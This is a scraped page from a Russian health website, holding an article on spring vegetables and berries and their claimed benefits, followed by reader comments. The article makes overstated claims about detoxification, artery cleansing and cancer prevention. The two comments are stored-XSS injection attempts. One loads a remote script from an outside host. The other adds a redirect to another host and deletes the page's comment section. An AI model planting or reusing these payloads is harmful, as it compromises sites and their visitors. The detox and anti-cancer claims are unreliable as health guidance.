Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что же есть весной, чтобы...  >>  Что же есть весной, чтобы чувствовать себя хорошо весь год?
 
Обратная связь
 

Что же есть весной, чтобы чувствовать себя хорошо весь год?

Размер шрифта
28 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Екатерина Кузнецова
Здоровье инфо
  • google_analytics: false
  • Нравится

Жизнь в северном климате означает, что в течение продолжительного времени мы обходимся без свежих овощей и фруктов. К декабрю качество продуктов в магазине уже находится под вопросом. К февралю фрукты и овощи теряют последние вкусовые качества и питательные вещества. Весной же на прилавках появляются свежие продукты, многие из которых стимулируют организм быстрее «выйти из спячки» и уменьшают последствия долгой зимы.

Что же есть весной, чтобы чувствовать себя хорошо весь год?

Что же есть весной, чтобы чувствовать себя хорошо весь год?

Артишоки очень часто недооценивают. А зря! Они содержат большое количество витамина С и клетчатки, которые увеличивают производство желчи и помогают кишечнику вывести токсины из организма. К тому же, артишоки содержат вещество, которое помогает бороться с жирами.

Спаржа является отличным источником витамина К и фолиевой кислоты, которая особенно необходима беременным женщинам. Не любите свежую спаржу? Попробуйте сделать ее на гриле, добавив лишь оливковое масло и немного морской соли.

Чеснок. Забудьте о своем дыхании и наслаждайтесь мощными целебными свойствами свежего чеснока. К тому же, если у вас есть возможность посадить чеснок осенью, то к концу весны у вас уже будет свежий продукт только что с грядки. Чеснок может разрушить вредные бактерии в организме, он также способствует очищению артерий от бляшек и стабилизации артериального давления. Чеснок известен и благодаря своим противораковым и антиоксидантным свойствам, а также очищению дыхательных путей.

Лук – это универсальное средство, когда дело касается укрепления здоровья. Исследования этого растения показали у него наличие мощных антиоксидантов и антиракового потенциала. Лук уменьшает уровень «плохого» холестерина (ЛПНП) в крови, при этом не влияя на уровень «хорошего» холестерина (ЛПВП). Богатый биотином и полифенолами, лук помогает в детоксикации дыхательных путей.

Клубника. Если вы не поклонник овощей, то помощь в очищении организма вам окажет ягода, богатая питательными веществами и ферментами. Всего в 8 клубничках содержится больше витамина С, чем в апельсине. Как и большинство вкусных ягод, клубника обладает высокой антиоксидантной способностью. Свежая или замороженная, в фруктово-ягодном салате или во фруктовом пюре клубника обладает не только восхитительным вкусом, но и способностью защитить от болезней сердца, артрита, потеря памяти, рака и множества других проблем со здоровьем. Очищение организма еще никогда не было таким вкусным!

Кресс водяной – не самый распространенный листовой зеленый салат, но, безусловно, один из самых полезных. Он увеличивает активность очищающих ферментов в организме и содержит фитонутриенты – вещества, успешно борющиеся с канцерогенами. В исследовании Научно-исследовательского центра пищевых продуктов в Норвиче (Великобритания), курильщики, которым давали 170 грамм кресс-салата в день, по результатам анализов имели значительно меньше средних сумм канцерогенов. Кресс водяной обладает умеренно острым вкусом, который придает неповторимый вкус салатам, супам и бутербродам.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как есть настоящую еду   Лучшая еда для беременной   Мыши с маразмом говорят, что клубника и огурцы защищают от слабоумия   Сельдерей и артишок убивают раковые клетки! Сколько надо съесть  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Еда для плоского живота. Часть 2
Супереда для вашего рта
Как улучшить свою печень. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.